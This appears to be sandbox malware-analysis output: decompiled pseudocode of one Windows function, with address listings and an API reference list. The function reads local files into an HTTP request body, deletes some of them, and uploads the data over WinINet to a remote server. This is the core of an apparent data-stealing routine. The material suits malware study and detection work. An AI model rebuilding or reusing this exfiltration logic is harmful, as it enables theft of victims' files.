                                                                                                                                                                        			E00407EDB(short* __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, LPCWSTR* _a24) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                        				long _v36;
                                                                                                                                                                        				long _v40;
                                                                                                                                                                        				void _v44;
                                                                                                                                                                        				void _v48;
                                                                                                                                                                        				WCHAR* _v52;
                                                                                                                                                                        				void* _t106;
                                                                                                                                                                        				void* _t109;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				signed int _t113;
                                                                                                                                                                        				signed int _t115;
                                                                                                                                                                        				void* _t119;
                                                                                                                                                                        				void* _t122;
                                                                                                                                                                        				void* _t123;
                                                                                                                                                                        				void* _t124;
                                                                                                                                                                        				void* _t128;
                                                                                                                                                                        				void* _t129;
                                                                                                                                                                        				void* _t131;
                                                                                                                                                                        				void* _t132;
                                                                                                                                                                        				long _t148;
                                                                                                                                                                        				void* _t164;
                                                                                                                                                                        				void* _t166;
                                                                                                                                                                        				long _t168;
                                                                                                                                                                        				long _t169;
                                                                                                                                                                        				signed int _t174;
                                                                                                                                                                        				long _t178;
                                                                                                                                                                        				void* _t179;
                                                                                                                                                                        				void* _t180;
                                                                                                                                                                        				void* _t182;
                                                                                                                                                                        				void* _t183;
                                                                                                                                                                        				void* _t186;
                                                                                                                                                                        				void* _t187;
                                                                                                                                                                        				void* _t188;
                                                                                                                                                                        				void* _t189;
                                                                                                                                                                        				void* _t190;
                                                                                                                                                                        				void* _t191;
                                                                                                                                                                        				int _t198;
                                                                                                                                                                        				void* _t209;
                                                                                                                                                                        				void* _t210;
                                                                                                                                                                        				void* _t211;
                                                                                                                                                                        				void* _t212;
                                                                                                                                                                        				void* _t215;
                                                                                                                                                                        				void* _t216;
                                                                                                                                                                        				void* _t217;
                                                                                                                                                                        				void* _t218;
                                                                                                                                                                        				void* _t220;
                                                                                                                                                                        				void* _t221;
                                                                                                                                                                        				void* _t223;
                                                                                                                                                                        				void* _t224;
                                                                                                                                                                        				intOrPtr _t226;
                                                                                                                                                                        				intOrPtr* _t227;
                                                                                                                                                                        				signed int _t229;
                                                                                                                                                                        				intOrPtr* _t281;
                                                                                                                                                                        				void* _t282;
                                                                                                                                                                        				intOrPtr _t285;
                                                                                                                                                                        				intOrPtr _t286;
                                                                                                                                                                        				intOrPtr _t288;
                                                                                                                                                                        				intOrPtr _t293;
                                                                                                                                                                        				intOrPtr _t294;
                                                                                                                                                                        				intOrPtr _t296;
                                                                                                                                                                        				intOrPtr _t297;
                                                                                                                                                                        				intOrPtr _t300;
                                                                                                                                                                        				intOrPtr _t301;
                                                                                                                                                                        				intOrPtr _t302;
                                                                                                                                                                        				intOrPtr _t303;
                                                                                                                                                                        				intOrPtr _t306;
                                                                                                                                                                        				intOrPtr _t308;
                                                                                                                                                                        				intOrPtr _t309;
                                                                                                                                                                        				intOrPtr _t312;
                                                                                                                                                                        				intOrPtr _t313;
                                                                                                                                                                        				intOrPtr _t314;
                                                                                                                                                                        				intOrPtr _t315;
                                                                                                                                                                        				intOrPtr _t317;
                                                                                                                                                                        				void* _t318;
                                                                                                                                                                        				signed int _t319;
                                                                                                                                                                        				void* _t320;
                                                                                                                                                                        				void* _t321;
                                                                                                                                                                        				void* _t323;
                                                                                                                                                                        				void* _t326;
                                                                                                                                                                        				short* _t327;
                                                                                                                                                                        				signed short* _t328;
                                                                                                                                                                        				void* _t329;
                                                                                                                                                                        				void* _t331;
                                                                                                                                                                        				WCHAR* _t333;
                                                                                                                                                                        				void** _t338;
                                                                                                                                                                        				void* _t339;
                                                                                                                                                                        
                                                                                                                                                                        				_v20 = __edx;
                                                                                                                                                                        				_t327 = __ecx; // executed
                                                                                                                                                                        				_t106 = LocalAlloc(0x40, 0xc350);
                                                                                                                                                                        				_t281 =  *0x40e044; // 0x74655850
                                                                                                                                                                        				_t224 = _t106;
                                                                                                                                                                        				_v24 = _t224;
                                                                                                                                                                        				_t318 =  *_t281(0x40, 0x208);
                                                                                                                                                                        				_v28 = _t318;
                                                                                                                                                                        				if( *_t327 != 0x68) {
                                                                                                                                                                        					L14:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t109 = 0x74;
                                                                                                                                                                        				if( *((intOrPtr*)(_t327 + 2)) != _t109 ||  *((intOrPtr*)(_t327 + 4)) != _t109 ||  *((short*)(_t327 + 6)) != 0x70) {
                                                                                                                                                                        					goto L14;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t7 = _t327 + 8; // 0x4589d0ff
                                                                                                                                                                        					_v32 =  *_t7 & 0x0000ffff;
                                                                                                                                                                        					_t112 =  *((intOrPtr*)( *0x40e18c))(_t327,  *0x40e3ec);
                                                                                                                                                                        					_v16 = 0x2f;
                                                                                                                                                                        					_t282 = 0;
                                                                                                                                                                        					_t10 = _t112 + 6; // 0x6
                                                                                                                                                                        					_t328 = _t10;
                                                                                                                                                                        					_t113 =  *_t328 & 0x0000ffff;
                                                                                                                                                                        					_t229 = _t113;
                                                                                                                                                                        					if(_t113 == _v16) {
                                                                                                                                                                        						L7:
                                                                                                                                                                        						_t115 =  *((intOrPtr*)( *0x40e08c))(_t318);
                                                                                                                                                                        						_t319 = _a4;
                                                                                                                                                                        						_v52 =  &(_t328[_t115]);
                                                                                                                                                                        						_t119 = LocalAlloc(0x40, _t319 << 0x15); // executed
                                                                                                                                                                        						_v8 = _t119;
                                                                                                                                                                        						if(_t319 <= 0) {
                                                                                                                                                                        							L11:
                                                                                                                                                                        							_v16 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v8, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        							_t122 = LocalAlloc(0x40, _t319 << 0x14); // executed
                                                                                                                                                                        							_t329 = _t122;
                                                                                                                                                                        							_t123 = LocalAlloc(0x40, _t319 + _a12 << 0x14); // executed
                                                                                                                                                                        							_v12 = _t123;
                                                                                                                                                                        							_t320 = _t123;
                                                                                                                                                                        							_t124 = _v16;
                                                                                                                                                                        							if(_t124 == 0) {
                                                                                                                                                                        								L19:
                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                        								LocalFree(_t329); // executed
                                                                                                                                                                        								if(_a12 <= 0) {
                                                                                                                                                                        									L32:
                                                                                                                                                                        									_t128 =  *((intOrPtr*)( *0x40e044))(0x40, 0x100);
                                                                                                                                                                        									_t285 =  *0x40e3dc; // 0x6f4c10
                                                                                                                                                                        									_t129 = E0040A55D(_t128, _t285);
                                                                                                                                                                        									_t286 =  *0x40e43c; // 0x6f4cd0
                                                                                                                                                                        									_t131 = E0040A55D(E0040A55D(_t129, _t286), _v20);
                                                                                                                                                                        									_t288 =  *0x40e43c; // 0x6f4cd0
                                                                                                                                                                        									_t132 = E0040A55D(_t131, _t288);
                                                                                                                                                                        									_v20 = _t132;
                                                                                                                                                                        									_push( *((intOrPtr*)( *0x40e198))(_t132) + 1);
                                                                                                                                                                        									_push(_v20);
                                                                                                                                                                        									_push(_t320);
                                                                                                                                                                        									if( *((intOrPtr*)( *0x40e004))() != 0) {
                                                                                                                                                                        										_t320 = _t320 +  *((intOrPtr*)( *0x40e198))(_v20);
                                                                                                                                                                        									}
                                                                                                                                                                        									LocalFree(_v20);
                                                                                                                                                                        									_v44 = 0x927c0;
                                                                                                                                                                        									_v48 = 0x927c0;
                                                                                                                                                                        									_t331 =  *((intOrPtr*)( *0x40e124))(L"rqwrwqrqwrqw", 0, 0, 0, 0);
                                                                                                                                                                        									_v36 = _t331;
                                                                                                                                                                        									InternetSetOptionW(_t331, 6,  &_v44, 4);
                                                                                                                                                                        									InternetSetOptionW(_t331, 5,  &_v48, 4);
                                                                                                                                                                        									if(_t331 == 0) {
                                                                                                                                                                        										L45:
                                                                                                                                                                        										_t333 = MultiByteToWideChar(0xfde9, 0, _t224,  *((intOrPtr*)( *0x40e198))(0) + 1, _t224, 0);
                                                                                                                                                                        										_v52 = _t333;
                                                                                                                                                                        										_t148 = _t333 + _t333;
                                                                                                                                                                        										_v40 = _t148;
                                                                                                                                                                        										_t321 =  *((intOrPtr*)( *0x40e044))(0x40, _t148);
                                                                                                                                                                        										if(_t333 != 0) {
                                                                                                                                                                        											MultiByteToWideChar(0xfde9, 0, _t224,  *((intOrPtr*)( *0x40e198))(_v52) + 1, _t224, _t321);
                                                                                                                                                                        											 *((short*)(_v40 + _t321 - 2)) = 0;
                                                                                                                                                                        										}
                                                                                                                                                                        										if(_t321 != 0) {
                                                                                                                                                                        											LocalFree(_t321);
                                                                                                                                                                        										}
                                                                                                                                                                        										LocalFree(_v28);
                                                                                                                                                                        										LocalFree(_t224); // executed
                                                                                                                                                                        										LocalFree(_v12); // executed
                                                                                                                                                                        										return 1;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t162 =  ==  ? 0x1bb : 0;
                                                                                                                                                                        										_t163 = ( ==  ? 0x1bb : 0) & 0x0000ffff;
                                                                                                                                                                        										_t164 =  *((intOrPtr*)( *0x40e180))(_t331, _v28, ( ==  ? 0x1bb : 0) & 0x0000ffff, 0x73, 0x50, 0, 0, 3, 0, 1);
                                                                                                                                                                        										_v20 = _t164;
                                                                                                                                                                        										if(_t164 == 0) {
                                                                                                                                                                        											L44:
                                                                                                                                                                        											InternetCloseHandle(_t331);
                                                                                                                                                                        											goto L45;
                                                                                                                                                                        										}
                                                                                                                                                                        										_push(1);
                                                                                                                                                                        										_v40 = 0xc00000;
                                                                                                                                                                        										_t248 =  ==  ? _v40 : 0x400000;
                                                                                                                                                                        										_t166 = HttpOpenRequestW(_t164,  *0x40e25c, _v52, 0, 0, _a24,  ==  ? _v40 : 0x400000, 0x73); // executed
                                                                                                                                                                        										_t224 = _v24;
                                                                                                                                                                        										_v52 = _t166;
                                                                                                                                                                        										if(_t166 == 0) {
                                                                                                                                                                        											L43:
                                                                                                                                                                        											InternetCloseHandle(_v20);
                                                                                                                                                                        											goto L44;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t168 = _v12;
                                                                                                                                                                        										_t169 =  *((intOrPtr*)( *0x40e08c))(_t320 - _t168);
                                                                                                                                                                        										_t323 = _v52;
                                                                                                                                                                        										if(HttpSendRequestW(_t323, _a20, _t169, _a20, _t168) == 0) {
                                                                                                                                                                        											L42:
                                                                                                                                                                        											InternetCloseHandle(_t323); // executed
                                                                                                                                                                        											_t331 = _v36;
                                                                                                                                                                        											goto L43;
                                                                                                                                                                        										}
                                                                                                                                                                        										while(1) {
                                                                                                                                                                        											_push( &_v32);
                                                                                                                                                                        											_push(0xc350);
                                                                                                                                                                        											_push(_t224);
                                                                                                                                                                        											_push(_t323);
                                                                                                                                                                        											if( *((intOrPtr*)( *0x40e0fc))() == 0) {
                                                                                                                                                                        												goto L42;
                                                                                                                                                                        											}
                                                                                                                                                                        											_t174 = _v32;
                                                                                                                                                                        											if(_t174 == 0) {
                                                                                                                                                                        												goto L42;
                                                                                                                                                                        											}
                                                                                                                                                                        											 *((char*)(_t224 + _t174)) = 0;
                                                                                                                                                                        										}
                                                                                                                                                                        										goto L42;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        								_t226 = _a12;
                                                                                                                                                                        								_t338 = _a16 + 4;
                                                                                                                                                                        								do {
                                                                                                                                                                        									_t178 =  *((intOrPtr*)( *0x40e14c))( *_t338, 0);
                                                                                                                                                                        									_v36 = _t178;
                                                                                                                                                                        									_t49 = _t178 + 0x400; // 0x400
                                                                                                                                                                        									_t179 = LocalAlloc(0x40, _t49);
                                                                                                                                                                        									_t293 =  *0x40e3dc; // 0x6f4c10
                                                                                                                                                                        									_t180 = E0040A55D(_t179, _t293);
                                                                                                                                                                        									_t294 =  *0x40e43c; // 0x6f4cd0
                                                                                                                                                                        									_t182 = E0040A55D(E0040A55D(_t180, _t294), _v20);
                                                                                                                                                                        									_t296 =  *0x40e3dc; // 0x6f4c10
                                                                                                                                                                        									_t183 = E0040A55D(_t182, _t296);
                                                                                                                                                                        									_t297 =  *0x40e444; // 0x6f0428
                                                                                                                                                                        									_t186 = E0040A55D(E0040A55D(E0040A55D(_t183, _t297),  *(_t338 - 4)), "\"");
                                                                                                                                                                        									_t300 =  *0x40e3dc; // 0x6f4c10
                                                                                                                                                                        									_t187 = E0040A55D(_t186, _t300);
                                                                                                                                                                        									_t301 =  *0x40e3f0; // 0x6ec170
                                                                                                                                                                        									_t188 = E0040A55D(_t187, _t301);
                                                                                                                                                                        									_t302 =  *0x40e3dc; // 0x6f4c10
                                                                                                                                                                        									_t189 = E0040A55D(_t188, _t302);
                                                                                                                                                                        									_t303 =  *0x40e3dc; // 0x6f4c10
                                                                                                                                                                        									_t190 = E0040A55D(_t189, _t303);
                                                                                                                                                                        									_v16 = _t190;
                                                                                                                                                                        									_t191 =  *((intOrPtr*)( *0x40e198))(_t190);
                                                                                                                                                                        									_v8 = _t191;
                                                                                                                                                                        									_t54 = _t191 + 1; // 0x1
                                                                                                                                                                        									_push(_v16);
                                                                                                                                                                        									_push(_t320);
                                                                                                                                                                        									if( *((intOrPtr*)( *0x40e004))() != 0) {
                                                                                                                                                                        										_t320 = _t320 + _v8;
                                                                                                                                                                        										if( *_t338 != 0) {
                                                                                                                                                                        											_t198 = ReadFile( *_t338, _t320, _v36,  &_v40, 0); // executed
                                                                                                                                                                        											if(_t198 != 0) {
                                                                                                                                                                        												_t320 = _t320 + _v40;
                                                                                                                                                                        											}
                                                                                                                                                                        											CloseHandle( *_t338);
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        									if( *(_t338 - 4) != 0) {
                                                                                                                                                                        										LocalFree( *(_t338 - 4));
                                                                                                                                                                        									}
                                                                                                                                                                        									if(_t338[1] != 0) {
                                                                                                                                                                        										DeleteFileW(_t338[1]); // executed
                                                                                                                                                                        										LocalFree(_t338[1]);
                                                                                                                                                                        									}
                                                                                                                                                                        									LocalFree(_v16);
                                                                                                                                                                        									_t338 =  &(_t338[4]);
                                                                                                                                                                        									_t226 = _t226 - 1;
                                                                                                                                                                        								} while (_t226 != 0);
                                                                                                                                                                        								_t224 = _v24;
                                                                                                                                                                        								goto L32;
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_push(_t124);
                                                                                                                                                                        							_push(_t329);
                                                                                                                                                                        							_push(0xffffffff);
                                                                                                                                                                        							_push(_v8);
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_push(0xfde9);
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e0e4))() != 0) {
                                                                                                                                                                        								_push(_t329);
                                                                                                                                                                        								if( *((intOrPtr*)( *0x40e198))() > 0) {
                                                                                                                                                                        									_push(_v16);
                                                                                                                                                                        									_push(_t329);
                                                                                                                                                                        									_push(_v12);
                                                                                                                                                                        									if( *((intOrPtr*)( *0x40e004))() != 0) {
                                                                                                                                                                        										_t320 = _v16 - 1 + _v12;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        								goto L19;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_v8);
                                                                                                                                                                        							LocalFree(_t224);
                                                                                                                                                                        							LocalFree(_t329);
                                                                                                                                                                        							LocalFree(_v28);
                                                                                                                                                                        							goto L14;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t227 = _a8;
                                                                                                                                                                        							_v16 = _t319;
                                                                                                                                                                        							_t326 = _t119;
                                                                                                                                                                        							do {
                                                                                                                                                                        								_t209 = E0040A4C2(_v20);
                                                                                                                                                                        								_t306 =  *0x40e3f8; // 0x6d5cd8
                                                                                                                                                                        								_t339 = _t209; // executed
                                                                                                                                                                        								_t210 = E0040A503(_t326, _t306); // executed
                                                                                                                                                                        								_t211 = E0040A503(_t210, _t339);
                                                                                                                                                                        								_t308 =  *0x40e350; // 0x6d5d18
                                                                                                                                                                        								_t212 = E0040A503(_t211, _t308);
                                                                                                                                                                        								_t309 =  *0x40e340; // 0x6f61b0
                                                                                                                                                                        								_t215 = E0040A503(E0040A503(E0040A503(_t212, _t309),  *_t227), "\"");
                                                                                                                                                                        								_t312 =  *0x40e350; // 0x6d5d18
                                                                                                                                                                        								_t216 = E0040A503(_t215, _t312);
                                                                                                                                                                        								_t313 =  *0x40e35c; // 0x6f6150
                                                                                                                                                                        								_t217 = E0040A503(_t216, _t313);
                                                                                                                                                                        								_t314 =  *0x40e350; // 0x6d5d18
                                                                                                                                                                        								_t218 = E0040A503(_t217, _t314);
                                                                                                                                                                        								_t315 =  *0x40e350; // 0x6d5d18
                                                                                                                                                                        								_t220 = E0040A503(E0040A503(_t218, _t315),  *((intOrPtr*)(_t227 + 4)));
                                                                                                                                                                        								_t317 =  *0x40e350; // 0x6d5d18
                                                                                                                                                                        								_t221 = E0040A503(_t220, _t317); // executed
                                                                                                                                                                        								_t326 = _t221;
                                                                                                                                                                        								LocalFree(_t339);
                                                                                                                                                                        								_t25 =  &_v16;
                                                                                                                                                                        								 *_t25 = _v16 - 1;
                                                                                                                                                                        								_t227 = _t227 + 0xc;
                                                                                                                                                                        							} while ( *_t25 != 0);
                                                                                                                                                                        							_t224 = _v24;
                                                                                                                                                                        							_v8 = _t326;
                                                                                                                                                                        							_t319 = _a4;
                                                                                                                                                                        							goto L11;
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t223 = 0;
                                                                                                                                                                        						do {
                                                                                                                                                                        							_t282 = _t282 + 1;
                                                                                                                                                                        							 *(_t223 + _t318) = _t229;
                                                                                                                                                                        							_t223 = _t282 + _t282;
                                                                                                                                                                        							_t229 =  *(_t223 + _t328) & 0x0000ffff;
                                                                                                                                                                        						} while (_t229 != _v16);
                                                                                                                                                                        						goto L7;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}































































































                                                                                                                                                                        0x00407ef0
                                                                                                                                                                        0x00407ef3
                                                                                                                                                                        0x00407ef5
                                                                                                                                                                        0x00407ef7
                                                                                                                                                                        0x00407efd
                                                                                                                                                                        0x00407f06
                                                                                                                                                                        0x00407f0f
                                                                                                                                                                        0x00407f11
                                                                                                                                                                        0x00407f14
                                                                                                                                                                        0x004080f3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004080f3
                                                                                                                                                                        0x00407f1c
                                                                                                                                                                        0x00407f21
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407f3c
                                                                                                                                                                        0x00407f3c
                                                                                                                                                                        0x00407f46
                                                                                                                                                                        0x00407f4f
                                                                                                                                                                        0x00407f51
                                                                                                                                                                        0x00407f58
                                                                                                                                                                        0x00407f5a
                                                                                                                                                                        0x00407f5a
                                                                                                                                                                        0x00407f5d
                                                                                                                                                                        0x00407f60
                                                                                                                                                                        0x00407f66
                                                                                                                                                                        0x00407f7c
                                                                                                                                                                        0x00407f82
                                                                                                                                                                        0x00407f84
                                                                                                                                                                        0x00407f90
                                                                                                                                                                        0x00407f9b
                                                                                                                                                                        0x00407f9d
                                                                                                                                                                        0x00407fa2
                                                                                                                                                                        0x00408069
                                                                                                                                                                        0x0040808f
                                                                                                                                                                        0x00408092
                                                                                                                                                                        0x00408097
                                                                                                                                                                        0x004080a8
                                                                                                                                                                        0x004080aa
                                                                                                                                                                        0x004080ad
                                                                                                                                                                        0x004080af
                                                                                                                                                                        0x004080b4
                                                                                                                                                                        0x0040811f
                                                                                                                                                                        0x00408122
                                                                                                                                                                        0x00408129
                                                                                                                                                                        0x00408133
                                                                                                                                                                        0x00408275
                                                                                                                                                                        0x00408281
                                                                                                                                                                        0x00408283
                                                                                                                                                                        0x0040828b
                                                                                                                                                                        0x00408290
                                                                                                                                                                        0x004082a2
                                                                                                                                                                        0x004082a7
                                                                                                                                                                        0x004082af
                                                                                                                                                                        0x004082c1
                                                                                                                                                                        0x004082c7
                                                                                                                                                                        0x004082c8
                                                                                                                                                                        0x004082cb
                                                                                                                                                                        0x004082d0
                                                                                                                                                                        0x004082dc
                                                                                                                                                                        0x004082dc
                                                                                                                                                                        0x004082e1
                                                                                                                                                                        0x004082f2
                                                                                                                                                                        0x004082f5
                                                                                                                                                                        0x00408304
                                                                                                                                                                        0x0040830f
                                                                                                                                                                        0x00408312
                                                                                                                                                                        0x00408321
                                                                                                                                                                        0x00408329
                                                                                                                                                                        0x00408406
                                                                                                                                                                        0x0040842a
                                                                                                                                                                        0x0040842c
                                                                                                                                                                        0x0040842f
                                                                                                                                                                        0x00408435
                                                                                                                                                                        0x0040843a
                                                                                                                                                                        0x0040843e
                                                                                                                                                                        0x0040845d
                                                                                                                                                                        0x00408464
                                                                                                                                                                        0x00408464
                                                                                                                                                                        0x0040846b
                                                                                                                                                                        0x0040846e
                                                                                                                                                                        0x0040846e
                                                                                                                                                                        0x00408477
                                                                                                                                                                        0x0040847e
                                                                                                                                                                        0x00408487
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040832f
                                                                                                                                                                        0x0040834d
                                                                                                                                                                        0x00408350
                                                                                                                                                                        0x00408358
                                                                                                                                                                        0x0040835a
                                                                                                                                                                        0x0040835f
                                                                                                                                                                        0x004083ff
                                                                                                                                                                        0x00408400
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408400
                                                                                                                                                                        0x00408365
                                                                                                                                                                        0x00408379
                                                                                                                                                                        0x00408380
                                                                                                                                                                        0x00408396
                                                                                                                                                                        0x00408398
                                                                                                                                                                        0x0040839b
                                                                                                                                                                        0x004083a0
                                                                                                                                                                        0x004083f6
                                                                                                                                                                        0x004083f9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004083f9
                                                                                                                                                                        0x004083a2
                                                                                                                                                                        0x004083b8
                                                                                                                                                                        0x004083ba
                                                                                                                                                                        0x004083c6
                                                                                                                                                                        0x004083ec
                                                                                                                                                                        0x004083ed
                                                                                                                                                                        0x004083f3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004083f3
                                                                                                                                                                        0x004083da
                                                                                                                                                                        0x004083e2
                                                                                                                                                                        0x004083e3
                                                                                                                                                                        0x004083e4
                                                                                                                                                                        0x004083e5
                                                                                                                                                                        0x004083ea
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004083cf
                                                                                                                                                                        0x004083d4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004083d6
                                                                                                                                                                        0x004083d6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004083da
                                                                                                                                                                        0x00408329
                                                                                                                                                                        0x0040813c
                                                                                                                                                                        0x0040813f
                                                                                                                                                                        0x00408142
                                                                                                                                                                        0x0040814b
                                                                                                                                                                        0x00408153
                                                                                                                                                                        0x00408156
                                                                                                                                                                        0x0040815f
                                                                                                                                                                        0x00408161
                                                                                                                                                                        0x00408169
                                                                                                                                                                        0x0040816e
                                                                                                                                                                        0x00408180
                                                                                                                                                                        0x00408185
                                                                                                                                                                        0x0040818d
                                                                                                                                                                        0x00408192
                                                                                                                                                                        0x004081b0
                                                                                                                                                                        0x004081b5
                                                                                                                                                                        0x004081bd
                                                                                                                                                                        0x004081c2
                                                                                                                                                                        0x004081ca
                                                                                                                                                                        0x004081cf
                                                                                                                                                                        0x004081d7
                                                                                                                                                                        0x004081dc
                                                                                                                                                                        0x004081e4
                                                                                                                                                                        0x004081f0
                                                                                                                                                                        0x004081f3
                                                                                                                                                                        0x004081fb
                                                                                                                                                                        0x004081fe
                                                                                                                                                                        0x00408202
                                                                                                                                                                        0x00408205
                                                                                                                                                                        0x0040820a
                                                                                                                                                                        0x0040820c
                                                                                                                                                                        0x00408212
                                                                                                                                                                        0x00408225
                                                                                                                                                                        0x00408229
                                                                                                                                                                        0x0040822b
                                                                                                                                                                        0x0040822b
                                                                                                                                                                        0x00408230
                                                                                                                                                                        0x00408230
                                                                                                                                                                        0x00408212
                                                                                                                                                                        0x0040823a
                                                                                                                                                                        0x0040823f
                                                                                                                                                                        0x0040823f
                                                                                                                                                                        0x00408249
                                                                                                                                                                        0x0040824e
                                                                                                                                                                        0x00408257
                                                                                                                                                                        0x00408257
                                                                                                                                                                        0x00408260
                                                                                                                                                                        0x00408266
                                                                                                                                                                        0x00408269
                                                                                                                                                                        0x00408269
                                                                                                                                                                        0x00408272
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408272
                                                                                                                                                                        0x004080be
                                                                                                                                                                        0x004080bf
                                                                                                                                                                        0x004080c0
                                                                                                                                                                        0x004080c1
                                                                                                                                                                        0x004080c2
                                                                                                                                                                        0x004080c4
                                                                                                                                                                        0x004080c7
                                                                                                                                                                        0x004080c8
                                                                                                                                                                        0x004080d1
                                                                                                                                                                        0x004080ff
                                                                                                                                                                        0x00408104
                                                                                                                                                                        0x00408106
                                                                                                                                                                        0x0040810e
                                                                                                                                                                        0x0040810f
                                                                                                                                                                        0x00408116
                                                                                                                                                                        0x0040811c
                                                                                                                                                                        0x0040811c
                                                                                                                                                                        0x00408116
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408104
                                                                                                                                                                        0x004080d6
                                                                                                                                                                        0x004080dd
                                                                                                                                                                        0x004080e4
                                                                                                                                                                        0x004080ed
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407fa8
                                                                                                                                                                        0x00407fa8
                                                                                                                                                                        0x00407fab
                                                                                                                                                                        0x00407fae
                                                                                                                                                                        0x00407fb0
                                                                                                                                                                        0x00407fb3
                                                                                                                                                                        0x00407fb8
                                                                                                                                                                        0x00407fc0
                                                                                                                                                                        0x00407fc2
                                                                                                                                                                        0x00407fcb
                                                                                                                                                                        0x00407fd0
                                                                                                                                                                        0x00407fd8
                                                                                                                                                                        0x00407fdd
                                                                                                                                                                        0x00407ffa
                                                                                                                                                                        0x00407fff
                                                                                                                                                                        0x00408007
                                                                                                                                                                        0x0040800c
                                                                                                                                                                        0x00408014
                                                                                                                                                                        0x00408019
                                                                                                                                                                        0x00408021
                                                                                                                                                                        0x00408026
                                                                                                                                                                        0x00408038
                                                                                                                                                                        0x0040803d
                                                                                                                                                                        0x00408045
                                                                                                                                                                        0x0040804b
                                                                                                                                                                        0x0040804d
                                                                                                                                                                        0x00408053
                                                                                                                                                                        0x00408053
                                                                                                                                                                        0x00408057
                                                                                                                                                                        0x00408057
                                                                                                                                                                        0x00408060
                                                                                                                                                                        0x00408063
                                                                                                                                                                        0x00408066
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408066
                                                                                                                                                                        0x00407f68
                                                                                                                                                                        0x00407f68
                                                                                                                                                                        0x00407f6a
                                                                                                                                                                        0x00407f6a
                                                                                                                                                                        0x00407f6b
                                                                                                                                                                        0x00407f6f
                                                                                                                                                                        0x00407f72
                                                                                                                                                                        0x00407f76
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407f6a
                                                                                                                                                                        0x00407f66

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0000C350,?,00000000,00000001,?,?,?,?,?,00409B89,00000001,?,00000000,00000000,?), ref: 00407EF5
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00407F9B
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 0040804D
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00408092
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080A8
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080D6
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080DD
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080E4
                                                                                                                                                                        • LocalFree.KERNEL32(00000001,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080ED
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00408122
                                                                                                                                                                        • LocalFree.KERNELBASE(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00408129
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000400,?,?,?,?,?,00409B89,00000001,?), ref: 0040815F
                                                                                                                                                                        • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00409B89,00000001,?), ref: 00408225
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?), ref: 00408230
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040823F
                                                                                                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040824E
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 00408257
                                                                                                                                                                        • LocalFree.KERNEL32(0000002F,?,?,?,?,?,00409B89,00000001,?), ref: 00408260
                                                                                                                                                                        • lstrcpyn.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 004082CC
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 004082E1
